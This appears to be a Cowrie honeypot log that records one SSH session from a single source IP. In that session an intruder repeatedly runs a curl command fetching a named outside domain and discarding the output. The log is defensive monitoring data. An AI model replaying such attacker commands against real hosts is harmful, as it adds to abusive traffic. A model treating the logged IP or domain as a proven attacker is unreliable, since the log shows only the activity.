{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.301278Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.338909Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.339868Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.381034Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.382005Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.433401Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.434399Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.483776Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.484740Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.523921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.524915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.564858Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.565836Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.602562Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.603549Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.641126Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.642883Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.685843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.686919Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.758262Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.759372Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.798590Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.799904Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.837207Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.838469Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.890566Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.891632Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.932754Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.934203Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:22.970772Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:22.971766Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.008121Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.009098Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.046209Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.046888Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.085447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.086318Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.122631Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.123572Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.161142Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.162068Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.199131Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.200073Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.236890Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.238224Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.285891Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.287020Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.328431Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.329474Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.373872Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.375112Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.590278Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.591289Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.630416Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.631562Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.668447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.669355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.714188Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.715114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.752242Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.752991Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.804839Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.805759Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.845116Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.846071Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.899023Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.900328Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:23.953356Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:23.954376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.009275Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.010279Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.065320Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.066717Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.106719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.107739Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.147266Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.148309Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.190001Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.190977Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.244847Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.245856Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.294558Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.295515Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.333930Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.334930Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.386475Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.387577Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.436285Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.437184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.481245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.482213Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.519428Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.520421Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.562915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.563954Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.605752Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.606643Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.649604Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.650596Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.693769Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.694803Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.732132Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.733114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.769879Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.770920Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.822290Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.823574Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.861355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.862343Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.899574Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.900535Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.937139Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.938328Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:24.975230Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:24.976136Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.015101Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.016039Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.052823Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.053779Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.092597Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.093528Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.143969Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.144920Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.196733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.197711Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.345612Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.346587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.467893Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:25.469172Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:25.506866Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
